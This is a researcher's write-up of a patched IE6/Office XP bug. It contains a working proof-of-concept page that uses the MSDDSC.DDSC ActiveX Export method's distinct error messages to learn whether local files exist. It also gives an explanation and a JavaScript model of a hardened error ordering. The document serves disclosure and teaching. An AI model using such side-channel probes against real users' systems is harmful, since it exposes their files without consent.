I was looking at ActiveX controls that were marked safe for scripting but had interesting side channels. The MSDDSC.DDSC Dashboard Components control (installed with Office XP) exposed an Export method that accepted a file path. I found that depending on which error it threw, you could determine whether a local file existed — without actually reading the file. This was a pure information disclosure, limited to systems with IE6 and Office XP installed.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE6_CheckIfLocalFileExists</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>IE6_CheckIfLocalFileExists</h2>
</center>
<hr />
	<b>Note:</b> This bug works only on <u>IE6 when Office XP is installed</u>.<br /><br />
	Type a fileName and we will check if it exists or not:<br /><br />
	<input type="text" size="50" value="c:\windows\system32\sol.exe" id="fileName">&nbsp;&nbsp;&nbsp;<input type="button" value="Check if Exists" onclick="checkIfExists()"><br /><br />
<hr />
<br />
We are using the Export method from the MSDDSC.DDSC (Dashboard Components MSDDSC.DLL) ActiveX. We simply use a fileName as the argument, and depending on the error raised, we know
if the file exists or not.<br /><br />
<b>
dashBoard = new ActiveXObject("MSDDSC.DDSC");<br />
dashBoard.Export(Full_Path_To_The_FileName);<br />
</b>
<br />
If the file exists, we get an "Invalid pointer" error, which basically means that the second parameter of the Export method is invalid.<br />
If it does not exist, we get a "The system cannot locate the resource specified" error, which means that the file does not exist.<br />


<script language="JavaScript">

window.onerror = function(desc)
{
	//	"The system cannot locate the resource specified."
	if (desc.indexOf("resource") != -1)
	{
		alert("File not found");
	}
	//	"Invalid pointer." (It means that the file exists, but the second parameter of the Export method is invalid.)
	else
	{
		alert("File Exists!!");
	}
	return true;
}

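function checkIfExists()
{
	// Without the control, the call below would raise an unrelated error that onerror would misreport as "File Exists!!".
	if (!dashBoard) return;
	// This will raise an error and depending on it, we will know if the file exists or not.
	dashBoard.Export(document.all.fileName.value);
}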

// Init dashBoard ActiveX and make sure that we can load it.
var dashBoard = false;
try
{
	dashBoard = new ActiveXObject("MSDDSC.DDSC");
}
catch(e){}
if (!dashBoard)
{
	alert("It seems that the DashBoard ActiveX is not loadable.\n\nAre you sure that you are on a system with IE6 and Office XP installed?");
}

</script>
</font>
</body>
</html>

The Export method on MSDDSC.DDSC was designed to export dashboard data to a file, so it tries to open the path it is given. When the file exists, the control opens it successfully but then fails with “Invalid pointer” because the remaining parameters are missing — which is a different error than when the file simply cannot be found (“The system cannot locate the resource specified”). By catching these two distinct error strings in window.onerror, a web page could enumerate the filesystem one path at a time. The control was marked safe for scripting despite having this observable side channel.
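The error-ordering problem described above, modelled in plain JavaScript as an added example (not the control's code and not part of the original page). The `disk` set, the `target` parameter name and the hardened error messages are assumptions made for illustration.

```javascript
// Constructed stand-in for the local disk; these paths are sample data.
const disk = new Set(["c:\\windows\\system32\\sol.exe"]);

// Leaky ordering: the path is resolved before the remaining argument is
// validated, so the error text depends on whether the file exists.
function exportLeaky(path, target) {
  if (!disk.has(path.toLowerCase())) {
    throw new Error("The system cannot locate the resource specified.");
  }
  if (target === undefined) {
    throw new Error("Invalid pointer.");
  }
  return "exported";
}

// Hardened ordering: validate every argument before touching the disk,
// then report any filesystem failure with one generic message.
function exportHardened(path, target) {
  if (typeof path !== "string" || target === undefined) {
    throw new Error("Invalid argument.");
  }
  if (!disk.has(path.toLowerCase())) {
    throw new Error("Export failed.");
  }
  return "exported";
}

// What an untrusted caller can observe: only the error text of a call
// made with the second argument missing, as in the page's script.
function observe(exportFn, path) {
  try {
    exportFn(path);
    return "no error";
  } catch (e) {
    return e.message;
  }
}

// True when the two paths produce different observations, i.e. an oracle.
function leaksExistence(exportFn, existing, missing) {
  return observe(exportFn, existing) !== observe(exportFn, missing);
}

const present = "c:\\windows\\system32\\sol.exe";
const absent = "c:\\windows\\system32\\nosuchfile.exe"; // constructed path
console.log("leaky ordering leaks:", leaksExistence(exportLeaky, present, absent));
console.log("hardened ordering leaks:", leaksExistence(exportHardened, present, absent));
```

Reordering the checks closes only this particular oracle: a call with every argument supplied still succeeds or fails depending on the path, which is why a method that opens caller-supplied paths does not belong in a control marked safe for scripting.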

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.